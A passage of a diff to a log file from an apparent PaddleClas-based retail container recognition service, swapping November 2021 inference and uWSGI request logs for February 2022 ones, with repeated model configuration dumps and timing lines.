[0.485, 0.456, 0.406] +2022-02-08 13:57:25 INFO: order : +2022-02-08 13:57:25 INFO: scale : 0.00392157 +2022-02-08 13:57:25 INFO: std : [0.229, 0.224, 0.225] +2022-02-08 13:57:25 INFO: ToCHWImage : None +Inference: 373.9502429962158 ms per batch image [] 234 ["Please connect root to upload container's name and it's price!\n"] -[pid: 32765|app: 0|req: 11/19] 210.51.42.176 () {34 vars in 432 bytes} [Wed Nov 3 04:23:08 2021] POST /reference_client/ => generated 98 bytes in 5714 msecs (HTTP/1.1 200) 5 headers in 157 bytes (10 switches on core 0) -[pid: 32765|app: 0|req: 12/20] 106.12.223.200 () {36 vars in 488 bytes} [Wed Nov 3 04:26:11 2021] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32766|app: 0|req: 8/21] 106.12.223.202 () {36 vars in 488 bytes} [Wed Nov 3 04:26:13 2021] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 710/835] 125.94.202.110 () {34 vars in 450 bytes} [Tue Feb 8 13:57:24 2022] POST /reference_client/ => generated 98 bytes in 3036 msecs (HTTP/1.1 200) 5 headers in 157 bytes (21 switches on core 0) req -2021-11-03 04:33:50 INFO: +2022-02-08 13:59:23 INFO: =========================================================== == PaddleClas is powered by PaddlePaddle ! == =========================================================== @@ -2192,75 +4065,59 @@ req == https://github.com/PaddlePaddle/PaddleClas == =========================================================== -2021-11-03 04:33:50 INFO: DetPostProcess : -2021-11-03 04:33:50 INFO: DetPreProcess : -2021-11-03 04:33:50 INFO: transform_ops : -2021-11-03 04:33:50 INFO: DetResize : -2021-11-03 04:33:50 INFO: interp : 2 -2021-11-03 04:33:50 INFO: keep_ratio : False -2021-11-03 04:33:50 INFO: target_size : [640, 640] -2021-11-03 04:33:50 INFO: DetNormalizeImage : -2021-11-03 04:33:50 INFO: is_scale : True -2021-11-03 04:33:50 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 04:33:50 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 04:33:50 INFO: DetPermute : -2021-11-03 04:33:50 INFO: Global : -2021-11-03 04:33:50 INFO: batch_size : 1 -2021-11-03 04:33:50 INFO: cpu_num_threads : 10 -2021-11-03 04:33:50 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer -2021-11-03 04:33:50 INFO: enable_benchmark : True -2021-11-03 04:33:50 INFO: enable_mkldnn : True -2021-11-03 04:33:50 INFO: enable_profile : False -2021-11-03 04:33:50 INFO: gpu_mem : 8000 -2021-11-03 04:33:50 INFO: image_shape : [3, 640, 640] -2021-11-03 04:33:50 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg -2021-11-03 04:33:50 INFO: ir_optim : True -2021-11-03 04:33:50 INFO: labe_list : ['foreground'] -2021-11-03 04:33:50 INFO: max_det_results : 5 -2021-11-03 04:33:50 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer -2021-11-03 04:33:50 INFO: rec_nms_thresold : 0.05 -2021-11-03 04:33:50 INFO: threshold : 0.2 -2021-11-03 04:33:50 INFO: use_fp16 : False -2021-11-03 04:33:50 INFO: use_gpu : False -2021-11-03 04:33:50 INFO: use_tensorrt : False -2021-11-03 04:33:50 INFO: IndexProcess : -2021-11-03 04:33:50 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update -2021-11-03 04:33:50 INFO: return_k : 5 -2021-11-03 04:33:50 INFO: score_thres : 0.5 -2021-11-03 04:33:50 INFO: RecPostProcess : None -2021-11-03 04:33:50 INFO: RecPreProcess : -2021-11-03 04:33:50 INFO: transform_ops : -2021-11-03 04:33:50 INFO: ResizeImage : -2021-11-03 04:33:50 INFO: size : 224 -2021-11-03 04:33:50 INFO: NormalizeImage : -2021-11-03 04:33:50 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 04:33:50 INFO: order : -2021-11-03 04:33:50 INFO: scale : 0.00392157 -2021-11-03 04:33:50 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 04:33:50 INFO: ToCHWImage : None ---- Fused 0 subgraphs into layer_norm op. ---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation ---- Fused 0 subgraphs into layer_norm op. ---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation -Inference: 2467.1430587768555 ms per batch image +2022-02-08 13:59:23 INFO: DetPostProcess : +2022-02-08 13:59:23 INFO: DetPreProcess : +2022-02-08 13:59:23 INFO: transform_ops : +2022-02-08 13:59:23 INFO: DetResize : +2022-02-08 13:59:23 INFO: interp : 2 +2022-02-08 13:59:23 INFO: keep_ratio : False +2022-02-08 13:59:23 INFO: target_size : [640, 640] +2022-02-08 13:59:23 INFO: DetNormalizeImage : +2022-02-08 13:59:23 INFO: is_scale : True +2022-02-08 13:59:23 INFO: mean : [0.485, 0.456, 0.406] +2022-02-08 13:59:23 INFO: std : [0.229, 0.224, 0.225] +2022-02-08 13:59:23 INFO: DetPermute : +2022-02-08 13:59:23 INFO: Global : +2022-02-08 13:59:23 INFO: batch_size : 1 +2022-02-08 13:59:23 INFO: cpu_num_threads : 1 +2022-02-08 13:59:23 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-02-08 13:59:23 INFO: enable_benchmark : True +2022-02-08 13:59:23 INFO: enable_mkldnn : True +2022-02-08 13:59:23 INFO: enable_profile : False +2022-02-08 13:59:23 INFO: gpu_mem : 8000 +2022-02-08 13:59:23 INFO: image_shape : [3, 640, 640] +2022-02-08 13:59:23 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg +2022-02-08 13:59:23 INFO: ir_optim : True +2022-02-08 13:59:23 INFO: labe_list : ['foreground'] +2022-02-08 13:59:23 INFO: max_det_results : 5 +2022-02-08 13:59:23 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-02-08 13:59:23 INFO: rec_nms_thresold : 0.05 +2022-02-08 13:59:23 INFO: threshold : 0.2 +2022-02-08 13:59:23 INFO: use_fp16 : False +2022-02-08 13:59:23 INFO: use_gpu : False +2022-02-08 13:59:23 INFO: use_tensorrt : False +2022-02-08 13:59:23 INFO: IndexProcess : +2022-02-08 13:59:23 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-02-08 13:59:23 INFO: return_k : 5 +2022-02-08 13:59:23 INFO: score_thres : 0.5 +2022-02-08 13:59:23 INFO: RecPostProcess : None +2022-02-08 13:59:23 INFO: RecPreProcess : +2022-02-08 13:59:23 INFO: transform_ops : +2022-02-08 13:59:23 INFO: ResizeImage : +2022-02-08 13:59:23 INFO: size : 224 +2022-02-08 13:59:23 INFO: NormalizeImage : +2022-02-08 13:59:23 INFO: mean : [0.485, 0.456, 0.406] +2022-02-08 13:59:23 INFO: order : +2022-02-08 13:59:23 INFO: scale : 0.00392157 +2022-02-08 13:59:23 INFO: std : [0.229, 0.224, 0.225] +2022-02-08 13:59:23 INFO: ToCHWImage : None +Inference: 374.36413764953613 ms per batch image [] 234 ["Please connect root to upload container's name and it's price!\n"] -[pid: 32765|app: 0|req: 13/22] 210.51.42.176 () {34 vars in 432 bytes} [Wed Nov 3 04:33:48 2021] POST /reference_client/ => generated 98 bytes in 6494 msecs (HTTP/1.1 200) 5 headers in 157 bytes (10 switches on core 0) +[pid: 19148|app: 0|req: 711/836] 125.94.202.110 () {34 vars in 450 bytes} [Tue Feb 8 13:59:22 2022] POST /reference_client/ => generated 98 bytes in 2995 msecs (HTTP/1.1 200) 5 headers in 157 bytes (21 switches on core 0) req -2021-11-03 04:34:18 INFO: +2022-02-08 14:04:50 INFO: =========================================================== == PaddleClas is powered by PaddlePaddle ! == =========================================================== @@ -2270,124 +4127,59 @@ req == https://github.com/PaddlePaddle/PaddleClas == =========================================================== -2021-11-03 04:34:18 INFO: DetPostProcess : -2021-11-03 04:34:18 INFO: DetPreProcess : -2021-11-03 04:34:18 INFO: transform_ops : -2021-11-03 04:34:18 INFO: DetResize : -2021-11-03 04:34:18 INFO: interp : 2 -2021-11-03 04:34:18 INFO: keep_ratio : False -2021-11-03 04:34:18 INFO: target_size : [640, 640] -2021-11-03 04:34:18 INFO: DetNormalizeImage : -2021-11-03 04:34:18 INFO: is_scale : True -2021-11-03 04:34:18 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 04:34:18 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 04:34:18 INFO: DetPermute : -2021-11-03 04:34:18 INFO: Global : -2021-11-03 04:34:18 INFO: batch_size : 1 -2021-11-03 04:34:18 INFO: cpu_num_threads : 10 -2021-11-03 04:34:18 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer -2021-11-03 04:34:18 INFO: enable_benchmark : True -2021-11-03 04:34:18 INFO: enable_mkldnn : True -2021-11-03 04:34:18 INFO: enable_profile : False -2021-11-03 04:34:18 INFO: gpu_mem : 8000 -2021-11-03 04:34:18 INFO: image_shape : [3, 640, 640] -2021-11-03 04:34:18 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg -2021-11-03 04:34:18 INFO: ir_optim : True -2021-11-03 04:34:18 INFO: labe_list : ['foreground'] -2021-11-03 04:34:18 INFO: max_det_results : 5 -2021-11-03 04:34:18 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer -2021-11-03 04:34:18 INFO: rec_nms_thresold : 0.05 -2021-11-03 04:34:18 INFO: threshold : 0.2 -2021-11-03 04:34:18 INFO: use_fp16 : False -2021-11-03 04:34:18 INFO: use_gpu : False -2021-11-03 04:34:18 INFO: use_tensorrt : False -2021-11-03 04:34:18 INFO: IndexProcess : -2021-11-03 04:34:18 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update -2021-11-03 04:34:18 INFO: return_k : 5 -2021-11-03 04:34:18 INFO: score_thres : 0.5 -2021-11-03 04:34:18 INFO: RecPostProcess : None -2021-11-03 04:34:18 INFO: RecPreProcess : -2021-11-03 04:34:18 INFO: transform_ops : -2021-11-03 04:34:18 INFO: ResizeImage : -2021-11-03 04:34:18 INFO: size : 224 -2021-11-03 04:34:18 INFO: NormalizeImage : -2021-11-03 04:34:18 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 04:34:18 INFO: order : -2021-11-03 04:34:18 INFO: scale : 0.00392157 -2021-11-03 04:34:18 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 04:34:18 INFO: ToCHWImage : None ---- Fused 0 subgraphs into layer_norm op. ---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation ---- Fused 0 subgraphs into layer_norm op. ---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation -Inference: 2219.644069671631 ms per batch image +2022-02-08 14:04:50 INFO: DetPostProcess : +2022-02-08 14:04:50 INFO: DetPreProcess : +2022-02-08 14:04:50 INFO: transform_ops : +2022-02-08 14:04:50 INFO: DetResize : +2022-02-08 14:04:50 INFO: interp : 2 +2022-02-08 14:04:50 INFO: keep_ratio : False +2022-02-08 14:04:50 INFO: target_size : [640, 640] +2022-02-08 14:04:50 INFO: DetNormalizeImage : +2022-02-08 14:04:50 INFO: is_scale : True +2022-02-08 14:04:50 INFO: mean : [0.485, 0.456, 0.406] +2022-02-08 14:04:50 INFO: std : [0.229, 0.224, 0.225] +2022-02-08 14:04:50 INFO: DetPermute : +2022-02-08 14:04:50 INFO: Global : +2022-02-08 14:04:50 INFO: batch_size : 1 +2022-02-08 14:04:50 INFO: cpu_num_threads : 1 +2022-02-08 14:04:50 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-02-08 14:04:50 INFO: enable_benchmark : True +2022-02-08 14:04:50 INFO: enable_mkldnn : True +2022-02-08 14:04:50 INFO: enable_profile : False +2022-02-08 14:04:50 INFO: gpu_mem : 8000 +2022-02-08 14:04:50 INFO: image_shape : [3, 640, 640] +2022-02-08 14:04:50 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg +2022-02-08 14:04:50 INFO: ir_optim : True +2022-02-08 14:04:50 INFO: labe_list : ['foreground'] +2022-02-08 14:04:50 INFO: max_det_results : 5 +2022-02-08 14:04:50 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-02-08 14:04:50 INFO: rec_nms_thresold : 0.05 +2022-02-08 14:04:50 INFO: threshold : 0.2 +2022-02-08 14:04:50 INFO: use_fp16 : False +2022-02-08 14:04:50 INFO: use_gpu : False +2022-02-08 14:04:50 INFO: use_tensorrt : False +2022-02-08 14:04:50 INFO: IndexProcess : +2022-02-08 14:04:50 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-02-08 14:04:50 INFO: return_k : 5 +2022-02-08 14:04:50 INFO: score_thres : 0.5 +2022-02-08 14:04:50 INFO: RecPostProcess : None +2022-02-08 14:04:50 INFO: RecPreProcess : +2022-02-08 14:04:50 INFO: transform_ops : +2022-02-08 14:04:50 INFO: ResizeImage : +2022-02-08 14:04:50 INFO: size : 224 +2022-02-08 14:04:50 INFO: NormalizeImage : +2022-02-08 14:04:50 INFO: mean : [0.485, 0.456, 0.406] +2022-02-08 14:04:50 INFO: order : +2022-02-08 14:04:50 INFO: scale : 0.00392157 +2022-02-08 14:04:50 INFO: std : [0.229, 0.224, 0.225] +2022-02-08 14:04:50 INFO: ToCHWImage : None +Inference: 373.6741542816162 ms per batch image [] 234 ["Please connect root to upload container's name and it's price!\n"] -[pid: 32766|app: 0|req: 9/23] 210.51.42.176 () {34 vars in 432 bytes} [Wed Nov 3 04:34:17 2021] POST /reference_client/ => generated 98 bytes in 5945 msecs (HTTP/1.1 200) 5 headers in 157 bytes (8 switches on core 0) -2021-11-03 04:37:54 INFO: -=========================================================== -== PaddleClas is powered by PaddlePaddle ! == -=========================================================== -== == -== For more info please go to the following website. == -== == -== https://github.com/PaddlePaddle/PaddleClas == -=========================================================== - -2021-11-03 04:37:54 INFO: Global : -2021-11-03 04:37:54 INFO: batch_size : 32 -2021-11-03 04:37:54 INFO: cpu_num_threads : 10 -2021-11-03 04:37:54 INFO: enable_benchmark : True -2021-11-03 04:37:54 INFO: enable_mkldnn : True -2021-11-03 04:37:54 INFO: enable_profile : False -2021-11-03 04:37:54 INFO: gpu_mem : 8000 -2021-11-03 04:37:54 INFO: ir_optim : True -2021-11-03 04:37:54 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer -2021-11-03 04:37:54 INFO: use_fp16 : False -2021-11-03 04:37:54 INFO: use_gpu : True -2021-11-03 04:37:54 INFO: use_tensorrt : False -2021-11-03 04:37:54 INFO: IndexProcess : -2021-11-03 04:37:54 INFO: data_file : /root/Smart_container/PaddleClas/dataset/retail/data_update.txt -2021-11-03 04:37:54 INFO: delimiter : -2021-11-03 04:37:54 INFO: dist_type : IP -2021-11-03 04:37:54 INFO: embedding_size : 512 -2021-11-03 04:37:54 INFO: image_root : /root/Smart_container/PaddleClas/dataset/retail -2021-11-03 04:37:54 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update -2021-11-03 04:37:54 INFO: index_method : HNSW32 -2021-11-03 04:37:54 INFO: index_operation : new -2021-11-03 04:37:54 INFO: RecPostProcess : None -2021-11-03 04:37:54 INFO: RecPreProcess : -2021-11-03 04:37:54 INFO: transform_ops : -2021-11-03 04:37:54 INFO: ResizeImage : -2021-11-03 04:37:54 INFO: size : 224 -2021-11-03 04:37:54 INFO: NormalizeImage : -2021-11-03 04:37:54 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 04:37:54 INFO: order : -2021-11-03 04:37:54 INFO: scale : 0.00392157 -2021-11-03 04:37:54 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 04:37:54 INFO: ToCHWImage : None -E1103 04:37:54.299724 33328 analysis_config.cc:81] Please compile with gpu to EnableGpu() ---- Fused 0 subgraphs into layer_norm op. - 0%| | 0/200 [00:00 generated 149 bytes in 27052 msecs (HTTP/1.1 200) 5 headers in 158 bytes (4 switches on core 0) -[pid: 32766|app: 0|req: 10/25] 106.12.223.202 () {36 vars in 488 bytes} [Wed Nov 3 04:38:35 2021] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32758|app: 0|req: 1/26] 106.12.223.204 () {36 vars in 488 bytes} [Wed Nov 3 04:38:36 2021] GET / => generated 179 bytes in 455 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 712/837] 125.94.202.110 () {34 vars in 450 bytes} [Tue Feb 8 14:04:49 2022] POST /reference_client/ => generated 98 bytes in 3068 msecs (HTTP/1.1 200) 5 headers in 157 bytes (25 switches on core 0) req -2021-11-03 04:38:55 INFO: +2022-02-08 14:19:03 INFO: =========================================================== == PaddleClas is powered by PaddlePaddle ! == =========================================================== @@ -2397,155 +4189,552 @@ req == https://github.com/PaddlePaddle/PaddleClas == =========================================================== -2021-11-03 04:38:55 INFO: DetPostProcess : -2021-11-03 04:38:55 INFO: DetPreProcess : -2021-11-03 04:38:55 INFO: transform_ops : -2021-11-03 04:38:55 INFO: DetResize : -2021-11-03 04:38:55 INFO: interp : 2 -2021-11-03 04:38:55 INFO: keep_ratio : False -2021-11-03 04:38:55 INFO: target_size : [640, 640] -2021-11-03 04:38:55 INFO: DetNormalizeImage : -2021-11-03 04:38:55 INFO: is_scale : True -2021-11-03 04:38:55 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 04:38:55 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 04:38:55 INFO: DetPermute : -2021-11-03 04:38:55 INFO: Global : -2021-11-03 04:38:55 INFO: batch_size : 1 -2021-11-03 04:38:55 INFO: cpu_num_threads : 10 -2021-11-03 04:38:55 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer -2021-11-03 04:38:55 INFO: enable_benchmark : True -2021-11-03 04:38:55 INFO: enable_mkldnn : True -2021-11-03 04:38:55 INFO: enable_profile : False -2021-11-03 04:38:55 INFO: gpu_mem : 8000 -2021-11-03 04:38:55 INFO: image_shape : [3, 640, 640] -2021-11-03 04:38:55 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg -2021-11-03 04:38:55 INFO: ir_optim : True -2021-11-03 04:38:55 INFO: labe_list : ['foreground'] -2021-11-03 04:38:55 INFO: max_det_results : 5 -2021-11-03 04:38:55 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer -2021-11-03 04:38:55 INFO: rec_nms_thresold : 0.05 -2021-11-03 04:38:55 INFO: threshold : 0.2 -2021-11-03 04:38:55 INFO: use_fp16 : False -2021-11-03 04:38:55 INFO: use_gpu : False -2021-11-03 04:38:55 INFO: use_tensorrt : False -2021-11-03 04:38:55 INFO: IndexProcess : -2021-11-03 04:38:55 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update -2021-11-03 04:38:55 INFO: return_k : 5 -2021-11-03 04:38:55 INFO: score_thres : 0.5 -2021-11-03 04:38:55 INFO: RecPostProcess : None -2021-11-03 04:38:55 INFO: RecPreProcess : -2021-11-03 04:38:55 INFO: transform_ops : -2021-11-03 04:38:55 INFO: ResizeImage : -2021-11-03 04:38:55 INFO: size : 224 -2021-11-03 04:38:55 INFO: NormalizeImage : -2021-11-03 04:38:55 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 04:38:55 INFO: order : -2021-11-03 04:38:55 INFO: scale : 0.00392157 -2021-11-03 04:38:55 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 04:38:55 INFO: ToCHWImage : None ---- Fused 0 subgraphs into layer_norm op. ---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation ---- Fused 0 subgraphs into layer_norm op. ---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation -Inference: 2497.6565837860107 ms per batch image +2022-02-08 14:19:03 INFO: DetPostProcess : +2022-02-08 14:19:03 INFO: DetPreProcess : +2022-02-08 14:19:03 INFO: transform_ops : +2022-02-08 14:19:03 INFO: DetResize : +2022-02-08 14:19:03 INFO: interp : 2 +2022-02-08 14:19:03 INFO: keep_ratio : False +2022-02-08 14:19:03 INFO: target_size : [640, 640] +2022-02-08 14:19:03 INFO: DetNormalizeImage : +2022-02-08 14:19:03 INFO: is_scale : True +2022-02-08 14:19:03 INFO: mean : [0.485, 0.456, 0.406] +2022-02-08 14:19:03 INFO: std : [0.229, 0.224, 0.225] +2022-02-08 14:19:03 INFO: DetPermute : +2022-02-08 14:19:03 INFO: Global : +2022-02-08 14:19:03 INFO: batch_size : 1 +2022-02-08 14:19:03 INFO: cpu_num_threads : 1 +2022-02-08 14:19:03 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-02-08 14:19:03 INFO: enable_benchmark : True +2022-02-08 14:19:03 INFO: enable_mkldnn : True +2022-02-08 14:19:03 INFO: enable_profile : False +2022-02-08 14:19:03 INFO: gpu_mem : 8000 +2022-02-08 14:19:03 INFO: image_shape : [3, 640, 640] +2022-02-08 14:19:03 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg +2022-02-08 14:19:03 INFO: ir_optim : True +2022-02-08 14:19:03 INFO: labe_list : ['foreground'] +2022-02-08 14:19:03 INFO: max_det_results : 5 +2022-02-08 14:19:03 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-02-08 14:19:03 INFO: rec_nms_thresold : 0.05 +2022-02-08 14:19:03 INFO: threshold : 0.2 +2022-02-08 14:19:03 INFO: use_fp16 : False +2022-02-08 14:19:03 INFO: use_gpu : False +2022-02-08 14:19:03 INFO: use_tensorrt : False +2022-02-08 14:19:03 INFO: IndexProcess : +2022-02-08 14:19:03 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-02-08 14:19:03 INFO: return_k : 5 +2022-02-08 14:19:03 INFO: score_thres : 0.5 +2022-02-08 14:19:03 INFO: RecPostProcess : None +2022-02-08 14:19:03 INFO: RecPreProcess : +2022-02-08 14:19:03 INFO: transform_ops : +2022-02-08 14:19:03 INFO: ResizeImage : +2022-02-08 14:19:03 INFO: size : 224 +2022-02-08 14:19:03 INFO: NormalizeImage : +2022-02-08 14:19:03 INFO: mean : [0.485, 0.456, 0.406] +2022-02-08 14:19:03 INFO: order : +2022-02-08 14:19:03 INFO: scale : 0.00392157 +2022-02-08 14:19:03 INFO: std : [0.229, 0.224, 0.225] +2022-02-08 14:19:03 INFO: ToCHWImage : None +Inference: 374.8137950897217 ms per batch image [] 234 ["Please connect root to upload container's name and it's price!\n"] -[pid: 32765|app: 0|req: 15/27] 210.51.42.176 () {34 vars in 432 bytes} [Wed Nov 3 04:38:53 2021] POST /reference_client/ => generated 98 bytes in 6617 msecs (HTTP/1.1 200) 5 headers in 157 bytes (12 switches on core 0) -2021-11-03 04:39:23 INFO: -=========================================================== -== PaddleClas is powered by PaddlePaddle ! == -=========================================================== -== == -== For more info please go to the following website. == -== == -== https://github.com/PaddlePaddle/PaddleClas == -=========================================================== - -2021-11-03 04:39:23 INFO: DetPostProcess : -2021-11-03 04:39:23 INFO: DetPreProcess : -2021-11-03 04:39:23 INFO: transform_ops : -2021-11-03 04:39:23 INFO: DetResize : -2021-11-03 04:39:23 INFO: interp : 2 -2021-11-03 04:39:23 INFO: keep_ratio : False -2021-11-03 04:39:23 INFO: target_size : [640, 640] -2021-11-03 04:39:23 INFO: DetNormalizeImage : -2021-11-03 04:39:23 INFO: is_scale : True -2021-11-03 04:39:23 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 04:39:23 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 04:39:23 INFO: DetPermute : -2021-11-03 04:39:23 INFO: Global : -2021-11-03 04:39:23 INFO: batch_size : 1 -2021-11-03 04:39:23 INFO: cpu_num_threads : 10 -2021-11-03 04:39:23 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer -2021-11-03 04:39:23 INFO: enable_benchmark : True -2021-11-03 04:39:23 INFO: enable_mkldnn : True -2021-11-03 04:39:23 INFO: enable_profile : False -2021-11-03 04:39:23 INFO: gpu_mem : 8000 -2021-11-03 04:39:23 INFO: image_shape : [3, 640, 640] -2021-11-03 04:39:23 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/retail/test1.jpg -2021-11-03 04:39:23 INFO: ir_optim : True -2021-11-03 04:39:23 INFO: labe_list : ['foreground'] -2021-11-03 04:39:23 INFO: max_det_results : 5 -2021-11-03 04:39:23 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer -2021-11-03 04:39:23 INFO: rec_nms_thresold : 0.05 -2021-11-03 04:39:23 INFO: threshold : 0.2 -2021-11-03 04:39:23 INFO: use_fp16 : False -2021-11-03 04:39:23 INFO: use_gpu : False -2021-11-03 04:39:23 INFO: use_tensorrt : False -2021-11-03 04:39:23 INFO: IndexProcess : -2021-11-03 04:39:23 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update -2021-11-03 04:39:23 INFO: return_k : 5 -2021-11-03 04:39:23 INFO: score_thres : 0.5 -2021-11-03 04:39:23 INFO: RecPostProcess : None -2021-11-03 04:39:23 INFO: RecPreProcess : -2021-11-03 04:39:23 INFO: transform_ops : -2021-11-03 04:39:23 INFO: ResizeImage : -2021-11-03 04:39:23 INFO: size : 224 -2021-11-03 04:39:23 INFO: NormalizeImage : -2021-11-03 04:39:23 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 04:39:23 INFO: order : -2021-11-03 04:39:23 INFO: scale : 0.00392157 -2021-11-03 04:39:23 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 04:39:23 INFO: ToCHWImage : None ---- Fused 0 subgraphs into layer_norm op. ---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation ---- Fused 0 subgraphs into layer_norm op. ---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation -Inference: 2380.8674812316895 ms per batch image 